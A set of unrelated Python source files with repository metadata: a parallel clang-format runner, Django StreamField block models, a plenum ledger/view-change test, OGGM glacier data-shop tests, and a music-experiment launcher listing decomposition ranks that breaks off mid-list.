return f
return os.path.normpath(os.path.join(directory, f))
def get_tidy_invocation(f, inplace):
"""Gets a command line for clang-tidy."""
start = ['clang-format-7']
if inplace:
start.append('-i')
start.append(f)
return start
def run_tidy(args, queue, lock):
"""Takes filenames out of queue and runs clang-tidy on them."""
while True:
name = queue.get()
invocation = get_tidy_invocation(name, args.inplace)
proc = subprocess.Popen(invocation, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, err = proc.communicate()
with lock:
if proc.returncode != 0:
print(' '.join(invocation))
print(output.decode('utf-8'))
print(err.decode('utf-8'))
queue.task_done()
def progress_bar_show(value):
if value is None:
return ''
return os.path.relpath(value, os.path.join(os.getcwd(), 'src', 'pi4home'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-j', '--jobs', type=int,
default=multiprocessing.cpu_count(),
help='number of tidy instances to be run in parallel.')
parser.add_argument('files', nargs='*', default=['src/pi4home'],
help='files to be processed (regex on path)')
parser.add_argument('-i', '--inplace', action='store_true',
help='apply fix-its')
parser.add_argument('-q', '--quiet', action='store_false',
help='Run clang-tidy in quiet mode')
args = parser.parse_args()
file_name_re = re.compile('|'.join(args.files))
files = []
for root, dirnames, filenames in os.walk(os.path.join('src', 'pi4home')):
for filename in fnmatch.filter(filenames, '*.cpp'):
files.append(os.path.normpath(os.path.join(os.getcwd(), root, filename)))
for filename in fnmatch.filter(filenames, '*.h'):
files.append(os.path.normpath(os.path.join(os.getcwd(), root, filename)))
for filename in fnmatch.filter(filenames, '*.tcc'):
files.append(os.path.normpath(os.path.join(os.getcwd(), root, filename)))
files = sorted([f for f in files if file_name_re.search(f)])
max_task = args.jobs
return_code = 0
try:
# Spin up a bunch of tidy-launching threads.
task_queue = queue.Queue(max_task)
# List of files with a non-zero return code.
lock = threading.Lock()
for _ in range(max_task):
t = threading.Thread(target=run_tidy,
args=(args, task_queue, lock))
t.daemon = True
t.start()
# Fill the queue with files.
with click.progressbar(files, width=30, file=sys.stderr,
item_show_func=progress_bar_show) as bar:
for name in bar:
task_queue.put(name)
# Wait for all threads to be done.
task_queue.join()
except KeyboardInterrupt:
print()
print('Ctrl-C detected, goodbye.')
if tmpdir:
shutil.rmtree(tmpdir)
os.kill(0, 9)
sys.exit(return_code)
if __name__ == '__main__':
main()
| 29.296875
| 85
| 0.598133
|
4a0f5088a3701f0051f90974198ab358b66e9db8
| 730
|
py
|
Python
|
test_project/streamblocks/models.py
|
HtmlMak/django-streamfield
|
d40a3128e531386b1bccbaeb7d6b7529a9650fd8
|
[
"BSD-2-Clause"
] | null | null | null |
test_project/streamblocks/models.py
|
HtmlMak/django-streamfield
|
d40a3128e531386b1bccbaeb7d6b7529a9650fd8
|
[
"BSD-2-Clause"
] | null | null | null |
test_project/streamblocks/models.py
|
HtmlMak/django-streamfield
|
d40a3128e531386b1bccbaeb7d6b7529a9650fd8
|
[
"BSD-2-Clause"
] | 1
|
2021-03-19T16:13:52.000Z
|
2021-03-19T16:13:52.000Z
|
from django.db import models
class RichText(models.Model):
text = models.TextField(blank=True, null=True)
options = {
"gray_bgr": {
"label": "Block on gray background",
"type": "checkbox",
"default": False
}
}
class Meta:
# This will use as name of block in admin
verbose_name="Text"
# list of objects
class Column(models.Model):
text = models.TextField(null=True, blank=True)
# StreamField option for list of objects
as_list = True
class Meta:
verbose_name="Column"
verbose_name_plural="Columns"
# Register blocks for StreamField as list of models
STREAMBLOCKS_MODELS = [
RichText,
Column
]
| 21.470588
| 53
| 0.613699
|
4a0f508961280f4d1f83a18c31814503994f1a7b
| 4,663
|
py
|
Python
|
plenum/test/node_request/test_different_ledger_request_interleave.py
|
steptan/indy-plenum
|
488bf63c82753a74a92ac6952da784825ffd4a3d
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_different_ledger_request_interleave.py
|
steptan/indy-plenum
|
488bf63c82753a74a92ac6952da784825ffd4a3d
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_different_ledger_request_interleave.py
|
steptan/indy-plenum
|
488bf63c82753a74a92ac6952da784825ffd4a3d
|
[
"Apache-2.0"
] | null | null | null |
from plenum.test.node_request.helper import sdk_ensure_pool_functional
from plenum.test.helper import sdk_send_random_and_check, sdk_send_random_requests, \
sdk_eval_timeout, sdk_get_and_check_replies
from plenum.test.node_catchup.helper import ensure_all_nodes_have_same_data
from plenum.test.pool_transactions.helper import sdk_add_new_nym, \
prepare_new_node_data, prepare_node_request, sdk_sign_and_send_prepared_request
from plenum.test.test_node import checkProtocolInstanceSetup
from plenum.test.view_change.helper import ensure_view_change
from plenum.test.conftest import tdirWithPoolTxns
from plenum.test.pool_transactions.conftest import sdk_node_theta_added
from plenum.test.primary_selection.conftest import sdk_one_node_added
from plenum.test.batching_3pc.conftest import tconf
def test_different_ledger_request_interleave(tconf, looper, txnPoolNodeSet,
sdk_one_node_added,
tdir,
tdirWithPoolTxns,
allPluginsPath,
sdk_pool_handle, sdk_wallet_client,
sdk_wallet_steward):
"""
Send pool and domain ledger requests such that they interleave, and do
view change in between and verify the pool is functional
"""
new_node = sdk_one_node_added
sdk_send_random_and_check(looper, txnPoolNodeSet, sdk_pool_handle,
sdk_wallet_client, 2)
ensure_all_nodes_have_same_data(looper, txnPoolNodeSet)
# Send domain ledger requests but don't wait for replies
requests = sdk_send_random_requests(looper, sdk_pool_handle,
sdk_wallet_client, 2)
# Add another node by sending pool ledger request
_, new_theta = sdk_node_theta_added(looper,
txnPoolNodeSet,
tdir,
tconf,
sdk_pool_handle,
sdk_wallet_steward,
allPluginsPath,
name='new_theta')
# Send more domain ledger requests but don't wait for replies
requests.extend(sdk_send_random_requests(looper, sdk_pool_handle,
sdk_wallet_client, 3))
# Do view change without waiting for replies
ensure_view_change(looper, nodes=txnPoolNodeSet)
checkProtocolInstanceSetup(looper, txnPoolNodeSet, retryWait=1)
# Make sure all requests are completed
total_timeout = sdk_eval_timeout(len(requests), len(txnPoolNodeSet))
sdk_get_and_check_replies(looper, requests, timeout=total_timeout)
sdk_ensure_pool_functional(looper, txnPoolNodeSet,
sdk_wallet_client, sdk_pool_handle)
new_steward_wallet, steward_did = sdk_add_new_nym(looper,
sdk_pool_handle,
sdk_wallet_steward,
'another_ste',
role='STEWARD')
# Send another pool ledger request (NODE) but don't wait for completion of
# request
next_node_name = 'next_node'
sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort = \
prepare_new_node_data(tconf, tdir, next_node_name)
node_req = looper.loop.run_until_complete(
prepare_node_request(next_node_name, steward_did, clientIp,
clientPort, nodeIp, nodePort, bls_key,
sigseed))
sdk_wallet = (new_steward_wallet, steward_did)
request_couple = sdk_sign_and_send_prepared_request(looper, sdk_wallet,
sdk_pool_handle,
node_req)
# Send more domain ledger requests but don't wait for replies
request_couples = [request_couple, *
sdk_send_random_requests(looper, sdk_pool_handle,
sdk_wallet_client, 5)]
# Make sure all requests are completed
total_timeout = sdk_eval_timeout(len(request_couples), len(txnPoolNodeSet))
sdk_get_and_check_replies(looper, request_couples, timeout=total_timeout)
# Make sure pool is functional
sdk_ensure_pool_functional(looper, txnPoolNodeSet,
sdk_wallet_client, sdk_pool_handle)
| 49.606383
| 85
| 0.610337
|
4a0f518bb8372855210207d52b453c9e6aa3b55c
| 24,996
|
py
|
Python
|
oggm/tests/test_shop.py
|
skachuck/oggm
|
b391e6923fb0c5269e10ea260f5199a26d5e1082
|
[
"BSD-3-Clause"
] | 156
|
2015-10-11T16:38:43.000Z
|
2022-03-24T04:19:16.000Z
|
oggm/tests/test_shop.py
|
skachuck/oggm
|
b391e6923fb0c5269e10ea260f5199a26d5e1082
|
[
"BSD-3-Clause"
] | 953
|
2015-10-11T16:26:14.000Z
|
2022-03-27T23:19:19.000Z
|
oggm/tests/test_shop.py
|
skachuck/oggm
|
b391e6923fb0c5269e10ea260f5199a26d5e1082
|
[
"BSD-3-Clause"
] | 92
|
2015-10-19T08:53:23.000Z
|
2022-03-28T08:00:17.000Z
|
import os
import warnings
import pytest
salem = pytest.importorskip('salem')
gpd = pytest.importorskip('geopandas')
import oggm
import xarray as xr
import numpy as np
import pandas as pd
from oggm import utils
from oggm.utils import get_demo_file
from oggm.shop import its_live, rgitopo, bedtopo
from oggm.core import gis, centerlines, massbalance
from oggm import cfg, tasks, workflow
pytestmark = pytest.mark.test_env("utils")
DO_PLOT = False
class Test_its_live:
@pytest.mark.slow
def test_repro_to_glacier(self, class_case_dir, monkeypatch):
# Init
cfg.initialize()
cfg.PATHS['working_dir'] = class_case_dir
cfg.PARAMS['use_intersects'] = False
cfg.PATHS['dem_file'] = get_demo_file('dem_Columbia.tif')
cfg.PARAMS['border'] = 10
entity = gpd.read_file(get_demo_file('RGI60-01.10689.shp')).iloc[0]
gdir = oggm.GlacierDirectory(entity)
tasks.define_glacier_region(gdir)
tasks.glacier_masks(gdir)
# use our files
region_files = {'ALA':
{'vx': get_demo_file('crop_ALA_G0120_0000_vx.tif'),
'vy': get_demo_file('crop_ALA_G0120_0000_vy.tif')}
}
monkeypatch.setattr(its_live, 'region_files', region_files)
monkeypatch.setattr(utils, 'file_downloader', lambda x: x)
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RuntimeWarning)
its_live.velocity_to_gdir(gdir)
with xr.open_dataset(gdir.get_filepath('gridded_data')) as ds:
mask = ds.glacier_mask.data.astype(bool)
vx = ds.obs_icevel_x.where(mask).data
vy = ds.obs_icevel_y.where(mask).data
vel = np.sqrt(vx**2 + vy**2)
assert np.nanmax(vel) > 2900
assert np.nanmin(vel) < 2
# We reproject with rasterio and check no big diff
cfg.BASENAMES['its_live_vx'] = ('its_live_vx.tif', '')
cfg.BASENAMES['its_live_vy'] = ('its_live_vy.tif', '')
gis.rasterio_to_gdir(gdir, region_files['ALA']['vx'], 'its_live_vx',
resampling='bilinear')
gis.rasterio_to_gdir(gdir, region_files['ALA']['vy'], 'its_live_vy',
resampling='bilinear')
with xr.open_rasterio(gdir.get_filepath('its_live_vx')) as da:
_vx = da.where(mask).data.squeeze()
with xr.open_rasterio(gdir.get_filepath('its_live_vy')) as da:
_vy = da.where(mask).data.squeeze()
_vel = np.sqrt(_vx**2 + _vy**2)
np.testing.assert_allclose(utils.rmsd(vel[mask], _vel[mask]), 0,
atol=40)
np.testing.assert_allclose(utils.md(vel[mask], _vel[mask]), 0,
atol=8)
if DO_PLOT:
import matplotlib.pyplot as plt
smap = salem.Map(gdir.grid.center_grid, countries=False)
smap.set_shapefile(gdir.read_shapefile('outlines'))
with warnings.catch_warnings():
warnings.filterwarnings('ignore', category=RuntimeWarning)
smap.set_topography(gdir.get_filepath('dem'))
vel = np.sqrt(vx ** 2 + vy ** 2)
smap.set_data(vel)
smap.set_plot_params(cmap='Blues', vmin=None, vmax=None)
xx, yy = gdir.grid.center_grid.xy_coordinates
xx, yy = smap.grid.transform(xx, yy, crs=gdir.grid.proj)
yy = yy[2::5, 2::5]
xx = xx[2::5, 2::5]
vx = vx[2::5, 2::5]
vy = vy[2::5, 2::5]
f, ax = plt.subplots()
smap.visualize(ax=ax, title='ITS_LIVE velocity',
cbar_title='m yr-1')
ax.quiver(xx, yy, vx, vy)
plt.show()
class Test_rgitopo:
def test_from_dem(self, class_case_dir, monkeypatch):
# Init
cfg.initialize()
cfg.PATHS['working_dir'] = class_case_dir
cfg.PARAMS['border'] = 10
monkeypatch.setattr(rgitopo, 'DEMS_URL', 'https://cluster.klima.uni-br'
'emen.de/~oggm/test_gdirs/dem'
's_v1/default/')
gd = rgitopo.init_glacier_directories_from_rgitopo(['RGI60-09.01004'])
gd = gd[0]
assert gd.has_file('dem')
assert gd.has_file('dem_source')
assert gd.has_file('outlines')
assert gd.has_file('intersects')
# we can work from here
tasks.glacier_masks(gd)
def test_qc(self, class_case_dir, monkeypatch):
# Init
cfg.initialize()
cfg.PATHS['working_dir'] = class_case_dir
cfg.PARAMS['border'] = 10
monkeypatch.setattr(rgitopo, 'DEMS_URL', 'https://cluster.klima.uni-br'
'emen.de/~oggm/test_gdirs/dem'
's_v1/default/')
gd = rgitopo.init_glacier_directories_from_rgitopo(['RGI60-09.01004'],
keep_dem_folders=True)
out = rgitopo.dem_quality_check(gd[0])
assert len(out) > 5
assert np.sum(list(out.values())) > 5
class Test_ecmwf:
def test_get_ecmwf_file(self):
from oggm.shop import ecmwf
for d, vars in ecmwf.BASENAMES.items():
for v, _ in vars.items():
assert os.path.isfile(ecmwf.get_ecmwf_file(d, v))
with pytest.raises(ValueError):
ecmwf.get_ecmwf_file('ERA5', 'zoup')
with pytest.raises(ValueError):
ecmwf.get_ecmwf_file('zoup', 'tmp')
def test_ecmwf_historical_delta_method(self, class_case_dir):
# Init
cfg.initialize()
cfg.PARAMS['use_intersects'] = False
cfg.PATHS['working_dir'] = class_case_dir
cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
hef_file = get_demo_file('Hintereisferner_RGI5.shp')
gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
tasks.process_ecmwf_data(gdir, dataset='ERA5',
output_filesuffix='ERA5')
tasks.process_ecmwf_data(gdir, dataset='CERA',
output_filesuffix='CERA')
# Original BC
tasks.historical_delta_method(gdir,
replace_with_ref_data=False,
delete_input_files=False,
ref_filesuffix='ERA5',
hist_filesuffix='CERA',
output_filesuffix='CERA_alone')
f_ref = gdir.get_filepath('climate_historical', filesuffix='ERA5')
f_h = gdir.get_filepath('climate_historical', filesuffix='CERA_alone')
with xr.open_dataset(f_ref) as ref, xr.open_dataset(f_h) as his:
# Let's do some basic checks
assert ref.attrs['ref_hgt'] == his.attrs['ref_hgt']
ci = gdir.get_climate_info('CERA_alone')
assert ci['baseline_climate_source'] == 'CERA|ERA5'
assert ci['baseline_hydro_yr_0'] == 1902
assert ci['baseline_hydro_yr_1'] == 2010
# Climate on common period
# (minus one year because of the automated stuff in code
sref = ref.sel(time=slice(ref.time[12], his.time[-1]))
shis = his.sel(time=slice(ref.time[12], his.time[-1]))
# Climate during the chosen period should be the same
np.testing.assert_allclose(sref.temp.mean(),
shis.temp.mean(),
atol=1e-3)
np.testing.assert_allclose(sref.prcp.mean(),
shis.prcp.mean(),
rtol=1e-3)
# And also the annual cycle
srefm = sref.groupby('time.month').mean(dim='time')
shism = shis.groupby('time.month').mean(dim='time')
np.testing.assert_allclose(srefm.temp, shism.temp, atol=1e-3)
np.testing.assert_allclose(srefm.prcp, shism.prcp, rtol=1e-3)
# And its std dev - but less strict
srefm = sref.groupby('time.month').std(dim='time')
shism = shis.groupby('time.month').std(dim='time')
np.testing.assert_allclose(srefm.temp, shism.temp, rtol=5e-2)
with pytest.raises(AssertionError):
# This clearly is not scaled
np.testing.assert_allclose(srefm.prcp, shism.prcp, rtol=0.5)
# Replaced
tasks.historical_delta_method(gdir,
replace_with_ref_data=True,
delete_input_files=False,
ref_filesuffix='ERA5',
hist_filesuffix='CERA',
output_filesuffix='CERA_repl')
f_ref = gdir.get_filepath('climate_historical', filesuffix='ERA5')
f_h = gdir.get_filepath('climate_historical', filesuffix='CERA_repl')
f_hr = gdir.get_filepath('climate_historical', filesuffix='CERA')
with xr.open_dataset(f_ref) as ref, xr.open_dataset(f_h) as his, \
xr.open_dataset(f_hr) as his_ref:
# Let's do some basic checks
assert ref.attrs['ref_hgt'] == his.attrs['ref_hgt']
ci = gdir.get_climate_info('CERA_repl')
assert ci['baseline_climate_source'] == 'CERA+ERA5'
assert ci['baseline_hydro_yr_0'] == 1902
assert ci['baseline_hydro_yr_1'] == 2018
# Climate on common period
sref = ref.sel(time=slice(ref.time[0], his.time[-1]))
shis = his.sel(time=slice(ref.time[0], his.time[-1]))
# Climate during the chosen period should be the same
np.testing.assert_allclose(sref.temp.mean(),
shis.temp.mean())
np.testing.assert_allclose(sref.prcp.mean(),
shis.prcp.mean())
# And also the annual cycle
srefm = sref.groupby('time.month').mean(dim='time')
shism = shis.groupby('time.month').mean(dim='time')
np.testing.assert_allclose(srefm.temp, shism.temp)
np.testing.assert_allclose(srefm.prcp, shism.prcp)
# And its std dev - should be same
srefm = sref.groupby('time.month').std(dim='time')
shism = shis.groupby('time.month').std(dim='time')
np.testing.assert_allclose(srefm.temp, shism.temp)
np.testing.assert_allclose(srefm.prcp, shism.prcp)
# In the past the two CERA datasets are different
his_ref = his_ref.sel(time=slice('1910', '1940'))
his = his.sel(time=slice('1910', '1940'))
assert np.abs(his.temp.mean() - his_ref.temp.mean()) > 1
assert np.abs(his.temp.std() - his_ref.temp.std()) > 0.3
# Delete files
tasks.historical_delta_method(gdir,
ref_filesuffix='ERA5',
hist_filesuffix='CERA')
assert not os.path.exists(gdir.get_filepath('climate_historical',
filesuffix='ERA5'))
assert not os.path.exists(gdir.get_filepath('climate_historical',
filesuffix='CERA'))
def test_ecmwf_workflow(self, class_case_dir):
# Init
cfg.initialize()
cfg.PARAMS['use_intersects'] = False
cfg.PATHS['working_dir'] = class_case_dir
cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
hef_file = get_demo_file('Hintereisferner_RGI5.shp')
gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
cfg.PARAMS['baseline_climate'] = 'CERA+ERA5L'
tasks.process_climate_data(gdir)
f_ref = gdir.get_filepath('climate_historical')
with xr.open_dataset(f_ref) as his:
# Let's do some basic checks
ci = gdir.get_climate_info()
assert ci['baseline_climate_source'] == 'CERA+ERA5L'
assert ci['baseline_hydro_yr_0'] == 1902
assert ci['baseline_hydro_yr_1'] == 2018
cfg.PARAMS['baseline_climate'] = 'CERA|ERA5'
tasks.process_climate_data(gdir)
f_ref = gdir.get_filepath('climate_historical')
with xr.open_dataset(f_ref) as his:
# Let's do some basic checks
ci = gdir.get_climate_info()
assert ci['baseline_climate_source'] == 'CERA|ERA5'
assert ci['baseline_hydro_yr_0'] == 1902
assert ci['baseline_hydro_yr_1'] == 2010
class Test_climate_datasets:
def test_all_at_once(self, class_case_dir):
# Init
cfg.initialize()
cfg.PARAMS['use_intersects'] = False
cfg.PATHS['working_dir'] = class_case_dir
cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
hef_file = get_demo_file('Hintereisferner_RGI5.shp')
gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
exps = ['CRU', 'HISTALP', 'ERA5', 'ERA5L', 'CERA']
ref_hgts = []
dft = []
dfp = []
for base in exps:
cfg.PARAMS['baseline_climate'] = base
tasks.process_climate_data(gdir, output_filesuffix=base)
f = gdir.get_filepath('climate_historical', filesuffix=base)
with xr.open_dataset(f) as ds:
ref_hgts.append(ds.ref_hgt)
assert ds.ref_pix_dis < 30000
dft.append(ds.temp.to_series())
dfp.append(ds.prcp.to_series())
dft = pd.concat(dft, axis=1, keys=exps)
dfp = pd.concat(dfp, axis=1, keys=exps)
# Common period
dfy = dft.resample('AS').mean().dropna().iloc[1:]
dfm = dft.groupby(dft.index.month).mean()
assert dfy.corr().min().min() > 0.44 # ERA5L and CERA do no correlate
assert dfm.corr().min().min() > 0.97
dfavg = dfy.describe()
# Correct for hgt
ref_h = ref_hgts[0]
for h, d in zip(ref_hgts, exps):
dfy[d] = dfy[d] - 0.0065 * (ref_h - h)
dfm[d] = dfm[d] - 0.0065 * (ref_h - h)
dfavg_cor = dfy.describe()
# After correction less spread
assert dfavg_cor.loc['mean'].std() < 0.8 * dfavg.loc['mean'].std()
assert dfavg_cor.loc['mean'].std() < 2.1
# PRECIP
# Common period
dfy = dfp.resample('AS').mean().dropna().iloc[1:] * 12
dfm = dfp.groupby(dfp.index.month).mean()
assert dfy.corr().min().min() > 0.5
assert dfm.corr().min().min() > 0.8
dfavg = dfy.describe()
assert dfavg.loc['mean'].std() / dfavg.loc['mean'].mean() < 0.25 # %
def test_vdr(self, class_case_dir):
# Init
cfg.initialize()
cfg.PARAMS['use_intersects'] = False
cfg.PATHS['working_dir'] = class_case_dir
cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
hef_file = get_demo_file('Hintereisferner_RGI5.shp')
gdir = workflow.init_glacier_directories(gpd.read_file(hef_file))[0]
exps = ['ERA5', 'ERA5dr']
files = []
ref_hgts = []
for base in exps:
cfg.PARAMS['baseline_climate'] = base
tasks.process_climate_data(gdir, output_filesuffix=base)
files.append(gdir.get_filepath('climate_historical',
filesuffix=base))
with xr.open_dataset(files[-1]) as ds:
ref_hgts.append(ds.ref_hgt)
assert ds.ref_pix_dis < 10000
with xr.open_dataset(files[0]) as d1, xr.open_dataset(files[1]) as d2:
np.testing.assert_allclose(d1.temp, d2.temp)
np.testing.assert_allclose(d1.prcp, d2.prcp)
# Fake tests, the plots look plausible
np.testing.assert_allclose(d2.gradient.mean(), -0.0058, atol=.001)
np.testing.assert_allclose(d2.temp_std.mean(), 3.35, atol=0.1)
@pytest.mark.slow
def test_hydro_month_changes(self, hef_gdir):
# test for HEF if applying different hydro_months does the right thing
# check if mb of neighbouring hydro_months correlate
# do this for different climate scenarios
# maybe there is already somewhere an overview or a better way to get
# these dates, but I did not find it
base_data_time = {'CRU': {'start_year': 1901, 'end_year': 2014},
'ERA5': {'start_year': 1979, 'end_year': 2018},
'ERA5dr': {'start_year': 1979, 'end_year': 2019},
'HISTALP': {'start_year': 1850, 'end_year': 2014},
'CERA': {'start_year': 1901, 'end_year': 2010},
'ERA5L': {'start_year': 1981, 'end_year': 2018}}
gdir = hef_gdir
oggm.core.flowline.init_present_time_glacier(gdir)
mb_mod = oggm.core.massbalance.PastMassBalance(gdir)
h, w = gdir.get_inversion_flowline_hw()
exps = ['ERA5dr', 'CRU', 'HISTALP', 'ERA5', 'ERA5L', 'CERA']
for base in exps:
# this does not need to be the best one,
# just for comparison between different hydro months
mu_opt = 213.54
files = []
ref_hgts = []
dft = []
dfp = []
tot_mbs = []
cfg.PARAMS['baseline_climate'] = base
for m in np.arange(1, 13):
cfg.PARAMS['hydro_month_nh'] = m
fsuff = '_{}_{}'.format(base, m)
tasks.process_climate_data(gdir, output_filesuffix=fsuff)
files.append(gdir.get_filepath('climate_historical',
filesuffix=fsuff))
with xr.open_dataset(files[-1]) as ds:
ref_hgts.append(ds.ref_hgt)
dft.append(ds.temp.to_series())
dfp.append(ds.prcp.to_series())
ci = gdir.get_climate_info(input_filesuffix=fsuff)
# check if the right climate source is used
assert base in ci['baseline_climate_source']
mm = str(m) if m > 9 else str(0)+str(m)
mm_e = str(m-1) if (m-1) > 9 else str(0)+str(m-1)
b_s_y = base_data_time[base]['start_year']
b_e_y = base_data_time[base]['end_year']
stime = '{}-{}-01'.format(b_s_y, mm)
assert ds.time[0] == np.datetime64(stime)
if m == 1:
assert ci['baseline_hydro_yr_0'] == b_s_y
if base == 'ERA5dr':
# do not have full 2019
assert ci['baseline_hydro_yr_1'] == b_e_y - 1
else:
assert ci['baseline_hydro_yr_1'] == b_e_y
elif m < 7 and base == 'ERA5dr':
# have data till 2019-05 for ERA5dr
stime = '{}-{}-01'.format(b_e_y, mm_e)
assert ds.time[-1] == np.datetime64(stime)
assert ci['baseline_hydro_yr_0'] == b_s_y + 1
assert ci['baseline_hydro_yr_1'] == b_e_y
else:
assert ci['baseline_hydro_yr_0'] == b_s_y + 1
if base == 'ERA5dr':
# do not have full 2019
stime = '{}-{}-01'.format(b_e_y-1, mm_e)
assert ds.time[-1] == np.datetime64(stime)
assert ci['baseline_hydro_yr_1'] == b_e_y - 1
else:
assert ci['baseline_hydro_yr_1'] == b_e_y
stime = '{}-{}-01'.format(b_e_y, mm_e)
assert ds.time[-1] == np.datetime64(stime)
mb_mod = massbalance.PastMassBalance(gdir,
mu_star=mu_opt,
input_filesuffix=fsuff,
bias=0,
check_calib_params=False)
years = np.arange(ds.hydro_yr_0, ds.hydro_yr_1 + 1)
mb_ts = mb_mod.get_specific_mb(heights=h, widths=w,
year=years)
tot_mbs.append(pd.Series(mb_ts))
# check if all ref_hgts are equal
# means that we likely compare same glacier and climate dataset
assert len(np.unique(ref_hgts)) == 1
# concatenate temperature and prcp from different hydromonths
dft = pd.concat(dft, axis=1, keys=np.arange(1, 13))
dfp = pd.concat(dfp, axis=1, keys=np.arange(1, 13))
# Common period
dft_na = dft.dropna().iloc[1:]
dfp_na = dfp.dropna().iloc[1:]
# check if the common period of temperature prcp
# series is equal for all starting hydromonth dates
assert np.all(dft_na.eq(dft_na.iloc[:, 0], axis=0).all(1))
assert np.all(dfp_na.eq(dfp_na.iloc[:, 0], axis=0).all(1))
# mass balance of different years
pd_tot_mbs = pd.concat(tot_mbs, axis=1, keys=np.arange(1, 13))
pd_tot_mbs = pd_tot_mbs.dropna()
# compute correlations
corrs = []
for m in np.arange(1, 12):
# check if correlation between time series of hydro_month =1,
# is high to hydro_month = 2 and so on
corrs.append(pd_tot_mbs.corr().loc[m, m+1])
# would be better if for hydro_month=12,
# correlation is tested to next year
assert np.mean(corrs) > 0.9
class Test_bedtopo:
def test_add_consensus(self, class_case_dir, monkeypatch):
# Init
cfg.initialize()
cfg.PARAMS['use_intersects'] = False
cfg.PATHS['working_dir'] = class_case_dir
cfg.PATHS['dem_file'] = get_demo_file('hef_srtm.tif')
entity = gpd.read_file(get_demo_file('Hintereisferner_RGI5.shp'))
entity['RGIId'] = 'RGI60-11.00897'
gdir = workflow.init_glacier_directories(entity)[0]
tasks.define_glacier_region(gdir)
tasks.glacier_masks(gdir)
ft = utils.get_demo_file('RGI60-11.00897_thickness.tif')
monkeypatch.setattr(utils, 'file_downloader', lambda x: ft)
bedtopo.add_consensus_thickness(gdir)
# Check with rasterio
cfg.add_to_basenames('consensus', 'consensus.tif')
gis.rasterio_to_gdir(gdir, ft, 'consensus', resampling='bilinear')
with xr.open_dataset(gdir.get_filepath('gridded_data')) as ds:
mine = ds.consensus_ice_thickness
with xr.open_rasterio(gdir.get_filepath('consensus')) as ds:
ref = ds.isel(band=0)
# Check area
my_area = np.sum(np.isfinite(mine.data)) * gdir.grid.dx**2
np.testing.assert_allclose(my_area, gdir.rgi_area_m2, rtol=0.07)
rio_area = np.sum(ref.data > 0) * gdir.grid.dx**2
np.testing.assert_allclose(rio_area, gdir.rgi_area_m2, rtol=0.15)
np.testing.assert_allclose(my_area, rio_area, rtol=0.15)
# They are not same:
# - interpolation not 1to1 same especially at borders
# - we preserve total volume
np.testing.assert_allclose(mine.sum(), ref.sum(), rtol=0.01)
assert utils.rmsd(ref, mine) < 2
# Check vol
cdf = pd.read_hdf(utils.get_demo_file('rgi62_itmix_df.h5'))
ref_vol = cdf.loc[gdir.rgi_id].vol_itmix_m3
my_vol = mine.sum() * gdir.grid.dx**2
np.testing.assert_allclose(my_vol, ref_vol)
# Now check the rest of the workflow
# Check that no error when var not there
vn = 'consensus_ice_thickness'
centerlines.elevation_band_flowline(gdir, bin_variables=[vn, 'foo'])
# Check vol
df = pd.read_csv(gdir.get_filepath('elevation_band_flowline'),
index_col=0)
my_vol = (df[vn] * df['area']).sum()
np.testing.assert_allclose(my_vol, ref_vol)
centerlines.fixed_dx_elevation_band_flowline(gdir,
bin_variables=[vn, 'foo'])
fdf = pd.read_csv(gdir.get_filepath('elevation_band_flowline',
filesuffix='_fixed_dx'),
index_col=0)
# Check vol
my_vol = (fdf[vn] * fdf['area_m2']).sum()
np.testing.assert_allclose(my_vol, ref_vol)
| 41.799331
| 82
| 0.550248
|
4a0f53cfedf7b8170d1524d5b3f7a08375958a1d
| 74
|
py
|
Python
|
src/video_dl/sites/pornhub/__init__.py
|
Jamesliyuan/video-dl
|
5369a8a4204787473891f959fd3fa57086a01862
|
[
"Apache-2.0"
] | 2
|
2022-01-22T18:11:33.000Z
|
2022-01-22T18:11:36.000Z
|
src/video_dl/sites/pornhub/__init__.py
|
Jamesliyuan/video-dl
|
5369a8a4204787473891f959fd3fa57086a01862
|
[
"Apache-2.0"
] | null | null | null |
src/video_dl/sites/pornhub/__init__.py
|
Jamesliyuan/video-dl
|
5369a8a4204787473891f959fd3fa57086a01862
|
[
"Apache-2.0"
] | 2
|
2021-08-19T15:56:15.000Z
|
2022-01-22T18:11:24.000Z
|
from .spider import PornhubSpider
from .extractor import PornhubExtractor
| 24.666667
| 39
| 0.864865
|
4a0f53dbf20f7772ede5c536aba74670f3d86c99
| 3,074
|
py
|
Python
|
music_experiments/multyexp_launcher.py
|
fosfrancesco/InvertibleCE
|
c972dc55040da085fc43e4128bc1955bc8e2114b
|
[
"Apache-2.0"
] | null | null | null |
music_experiments/multyexp_launcher.py
|
fosfrancesco/InvertibleCE
|
c972dc55040da085fc43e4128bc1955bc8e2114b
|
[
"Apache-2.0"
] | null | null | null |
music_experiments/multyexp_launcher.py
|
fosfrancesco/InvertibleCE
|
c972dc55040da085fc43e4128bc1955bc8e2114b
|
[
"Apache-2.0"
] | null | null | null |
from experiments_script import start_experiment_noclick
gpu_number = 0
layer = "layer4"
batch_size = 10
max_iter = 500
reducers = ["NMF", "NTD"]
nmf_ranks = ["1", "2", "3", "4", "5", "6", "10", "8", "12"]
ntd3_ranks = [
"[3,20,100]",
"[6,20,100]",
"[10,20,100]",
"[3,20,25]",
"[6,20,25]",
"[10,20,25]",
"[3,30,100]",
"[6,30,100]",
"[10,30,100]",
"[6,39,80]",
"[10,39,80]",
"[6,39,200]",
"[10,39,200]",
"[8,39,100]",
"[10,39,100]",
"[10,39,375]",
"[8,39,375]",
"[6,39,375]",
"[3,39,375]",
"[2,39,375]",
"[1,39,375]",
"[4,20,25]",
"[5,20,25]",
"[4,30,100]",
"[5,30,100]",
"[4,39,375]",
"[5,39,375]",
]
ntd4_ranks = [
"[3, 3, 2, 25]",
"[1, 3, 2, 25]",
"[2, 3, 2, 25]",
"[3, 5, 3, 25]",
"[3, 13, 3, 25]",
"[6, 13, 3, 25]",
"[3, 3, 3, 25]" "[3, 2, 3, 20]",
